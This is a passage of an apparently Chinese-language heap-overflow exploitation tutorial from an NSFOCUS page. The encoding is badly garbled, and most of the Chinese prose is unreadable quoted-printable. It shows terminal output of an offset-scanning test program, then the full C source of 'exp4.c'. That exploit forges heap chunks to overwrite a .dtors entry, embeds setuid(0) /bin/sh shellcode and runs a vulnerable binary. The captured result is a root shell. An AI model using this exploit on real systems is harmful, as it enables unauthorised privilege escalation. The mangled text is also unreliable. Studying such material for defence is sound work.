[+] found.i: 96,cont:AAAA =
ADDR:0xfffffff8
[+]=20
found.i:112,cont:AAAA ADDR:0xfffffff8
[+] =
found.i:128,cont:AAAA=20
ADDR:0xfffffff8
[+] found.i:144,cont:AAAA =
ADDR:0xfffffff8
[+]=20
found.i:160,cont:AAAA ADDR:0xfffffff8
[+] =
found.i:176,cont:AAAA=20
ADDR:0xfffffff8
[+] found.i:192,cont:AAAA =
ADDR:0xfffffff8
[+]=20
Offset:1
[-] not found
[+] Offset:2
[-] not =
found
[+]=20
Offset:3
[-] not found
[netconf@linux1 challenge]$ =
./test1=20
5
[+] PAD=3D5
[+] Offset:0
[+] found.i: =
64,cont:AAAA=20
ADDR:0xfffffff8
[+] Offset:1
[+]=20
found.i: 1,cont:AAAA ADDR:0xfffffff8
[+]=20
found.i:145,cont:AAAA ADDR:0xfffffff8
[+] Offset:2
[+] =
found.i: 82,cont:AAAA ADDR:0xfffffff8
[+] Offset:3
[+] =
found.i: 19,cont:AAAA ADDR:0xfffffff8
[+] =
found.i:163,cont:AAAA=20
ADDR:0xfffffff8
[+] Offset:4
[+] found.i:100,cont:AAAA =
ADDR:0xfffffff8
[netconf@linux1 challenge]$ ./test1 =
6
[+]=20
PAD=3D6
[+] Offset:0
[+] found.i: 32,cont:AAAA=20
ADDR:0xfffffff8
[+] found.i:112,cont:AAAA =
ADDR:0xfffffff8
[+]=20
found.i:192,cont:AAAA ADDR:0xfffffff8
[+] Offset:1
[-] =
not=20
found
[+] Offset:2
[+] found.i: 2,cont:AAAA =
ADDR:0xfffffff8
[+] found.i: 82,cont:AAAA =
ADDR:0xfffffff8
[+]=20
found.i:162,cont:AAAA ADDR:0xfffffff8
[+] Offset:3
[-] =
not=20
found
[+] Offset:4
[+] found.i: 52,cont:AAAA=20
ADDR:0xfffffff8
[+] found.i:132,cont:AAAA =
ADDR:0xfffffff8
[+]=20
Offset:5
[-] not found
[netconf@linux1 challenge]$ =
./test1=20
7
[+] PAD=3D7
[+] Offset:0
[+] found.i: =
80,cont:AAAA=20
ADDR:0xfffffff8
[+] Offset:1
[+] found.i:113,cont:AAAA =
ADDR:0xfffffff8
[+] Offset:2
[+] found.i:146,cont:AAAA =
ADDR:0xfffffff8
[+] Offset:3
[+]=20
found.i: 3,cont:AAAA ADDR:0xfffffff8
[+]=20
found.i:179,cont:AAAA ADDR:0xfffffff8
[+] Offset:4
[+] =
found.i: 36,cont:AAAA ADDR:0xfffffff8
[+] Offset:5
[+] =
found.i: 69,cont:AAAA ADDR:0xfffffff8
[+] Offset:6
[+] =
found.i:102,cont:AAAA ADDR:0xfffffff8
[netconf@linux1 =
challenge]$=20
./test1 8
[+] PAD=3D8
[+] Offset:0
[+] found.i: =
16,cont:AAAA ADDR:0xfffffff8
[+] found.i: 64,cont:AAAA=20
ADDR:0xfffffff8
[+] found.i:112,cont:AAAA =
ADDR:0xfffffff8
[+]=20
found.i:160,cont:AAAA ADDR:0xfffffff8
[+] Offset:1
[-] =
not=20
found
[+] Offset:2
[-] not found
[+] =
Offset:3
[-] not=20
found
[+] Offset:4
[+] found.i: 4,cont:AAAA =
ADDR:0xfffffff8
[+] found.i: 52,cont:AAAA =
ADDR:0xfffffff8
[+]=20
found.i:100,cont:AAAA ADDR:0xfffffff8
[+] =
found.i:148,cont:AAAA=20
ADDR:0xfffffff8
[+] found.i:196,cont:AAAA =
ADDR:0xfffffff8
[+]=20
Offset:5
[-] not found
[+] Offset:6
[-] not =
found
[+]=20
Offset:7
[-] not found
[netconf@linux1 challenge]$ =
./test1=20
9
[+] PAD=3D9
[+] Offset:0
[+] found.i: =
96,cont:AAAA=20
ADDR:0xfffffff8
[+] Offset:1
[+] found.i:161,cont:AAAA =
ADDR:0xfffffff8
[+] Offset:2
[+] found.i: 18,cont:AAAA =
ADDR:0xfffffff8
[+] Offset:3
[+] found.i: 83,cont:AAAA =
ADDR:0xfffffff8
[+] Offset:4
[+] found.i:148,cont:AAAA =
ADDR:0xfffffff8
[+] Offset:5
[+]=20
found.i: 5,cont:AAAA ADDR:0xfffffff8
[+]=20
Offset:6
[+] found.i: 70,cont:AAAA ADDR:0xfffffff8
[+] =
Offset:7
[+] found.i:135,cont:AAAA ADDR:0xfffffff8
[+] =
Offset:8
[+] found.i:200,cont:AAAA=20
ADDR:0xfffffff8
[netconf@linux1=20
=
challenge]$
=B4=D3=C9=CF=C3=E6=B5=C4=BC=C6=CB=E3=BF=C9=D2=D4=BF=
=B4=B3=F6, =CE=DE=C2=DBbuffer=BF=AA=CA=BC=B5=D8=D6=B7=B6=E0=C9=D9, =
=B5=B1PAD=CE=AA5,7,9=B5=C4=CA=B1=BA=F2,=20
=
=BE=AD=B9=FD=D3=D0=CF=DE=B4=CE=C1=D0=BE=D9=D7=DC=BF=C9=D2=D4=D5=D2=B5=BD=D5=
=E2=D1=F9=D2=BB=B8=F6=C2=FA=D7=E3=CC=F5=BC=FE=B5=C4=CE=BB=D6=C3. =
=CE=D2=C3=C7=C8=A1=D7=EE=D0=A1=B5=C4=CA=FD=BE=DD5=C0=B4=B9=B9=D4=EC=CE=D2=
=C3=C7=B5=C4p3.
[6].=20
=
=CE=D2=C3=C7=B5=C4exp
=D5=E2=D1=F9=CE=D2=C3=C7=BE=CD=BF=C9=D2=D4=D0=B4=
=B3=F6exploit=C1=CB:
[netconf@linux1 challenge]$ cat=20
exp4.c
/* exp4 */
#include=20
<stdlib.h>
#include <stdio.h>
#include=20
<unistd.h>
#define SIZE 20
#define FILL=20
=
200 &nbs=
p; /*=20
=
=CE=D2=C3=C7=D7=BC=B1=B8=CC=EE=B3=E4=B6=E0=C9=D9=B8=F6p3=BD=E1=B9=B9=C0=B4=
=C2=FA=D7=E3=D2=AA=C7=F3 */
#define PAD=20
=
5 =
#define=20
want_write_to_addr 0x080496dc+4-3*4 =
/*.dtors=B5=D8=D6=B7*/
#define=20
P2ADDR =20
=
0x08049738 &nb=
sp; =20
/* p2=B5=C4=B5=D8=D6=B7(chunk=B5=D8=D6=B7) */
#define =
shell_addr =20
=
0xbfffffa7 &nb=
sp; =20
/* shellcode=B5=D8=D6=B7 */
#define=20
P3ADDR =20
=
0xbfffff60 &nb=
sp; =20
/* p2->next=B5=C4=B5=D8=D6=B7*/
#define=20
P1ADDR (unsigned=20
=
long)(shell_addr-(FILL/(PAD+4))*(PAD+4)-0x08+1) /*=
=20
p2->prev chunk=B5=C4=B5=D8=D6=B7*/
#define=20
=
VULN "./vul2"
char =
shellcode[]=20
=
=3D
"\xeb\x0b\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\x31\xc0\x50\x50\xb0\xb5\xcd\x=
80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"=
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";
main(int=20
argc,char *argv[])
{
int=20
i,size=3DSIZE,size2,length;
char=20
=
*env[2],envbuf[400],buffer[100];
unsigned=20
long=20
=
p1size,p2size,p1addr;
&n=
bsp;memset(buffer,0,100);
if(argc>1)=20
=
size=3Datoi(argv[1]);
length=3D(int)(size+4)/8=
;
=20
if(length*8 =3D=3D=20
=
(size+4))length--;
length*=3D8;
=
;
for(i=3D0;i<length;i++)
&n=
bsp; buffer[i]=3D'A';
&=
nbsp; size2=3DP3ADDR-P1ADDR;
p1size=
=3Dsize2-(P3ADDR-P2ADDR);
p2size=3DP3ADDR-P2AD=
DR;
printf("p2size+p1size:%p+%p=3D%#x\n",p2siz=
e,p1size,p2size+p1size);
printf("p1addr:%p,p2a=
ddr:%p,p3addr=3D%p\n",P1ADDR,P2ADDR,P3ADDR);
*=
(unsigned=20
long=20
=
*)(buffer+i)=3Dp1size;
i+=3D4;
=
*(unsigned=20
long=20
=
*)(buffer+i)=3Dp2size;
i+=3D4;
&n=
bsp; memset(envbuf,0,400);
strcpy(e=
nvbuf,"STR=3D");
i=3Dstrlen(envbuf);
=
//=B9=B9=D4=ECp1=BA=CDp3
=20
*(unsigned long=20
=
*)(envbuf+i)=3Dwant_write_to_addr;
=20
*(unsigned long=20
*)(envbuf+i+4)=3Dshell_addr;
=20
i+=3D8;
=20
for(i;i<200;i+=3D9)
=20
{
=20
=
memset(envbuf+i,'A',PAD);
&n=
bsp;=20
*(unsigned long=20
*)(envbuf+i+PAD)=3D0xfffffff8;
=20
}
=20
=
memcpy(envbuf+i,shellcode,strlen(shellcode));
=
env[0]=3Denvbuf;
e=
nv[1]=3DNULL;
execle(VULN,VULN,buffer,NULL,env=
);
}
=CA=D4=D2=BB=CF=C2:=20
[netconf@linux1 challenge]$=20
=
./exp4
p2size+p1size:0xb7fb6828+0x4804985e=3D0x86
p1addr:0xbffffeda=
,p2addr:0x8049738,p3addr=3D0xbfffff60
[+]=20
input:AAAAAAAAAAAAAAAA^=98H(h=FB=B7
sh-2.05b# =
id
uid=3D0(root)=20
gid=3D500(netconf) =
groups=3D500(netconf)
sh-2.05b#
[7].=20
=B2=CE=BF=BC=CE=C4=D5=C2:
1. warning3: =
<=D2=BB=D6=D6=D0=C2=B5=C4heap=C7=F8=D2=E7=B3=F6=BC=BC=CA=F5=B7=D6=CE=F6=
> |
=BB=B6=D3=AD=B7=C3=CE=CA=CE=D2=C3=C7=B5=C4=D5=BE=B5=E3http://www.nsfocus.com/
=C2=CC=C3=
=CB=BF=C6=BC=BC=B8=F8=C4=FA=B0=B2=C8=AB=B5=C4=B1=A3=D5=CF | |
![3DTitle=20](3D"http://www.nsfocus.net/images/js_01.gif")
![3DLeft](3D"http://www.nsfocus.net/images/js_02.gif"=20)
![3DRight](3D"http://www.nsfocus.net/images/js_03.gif"=20)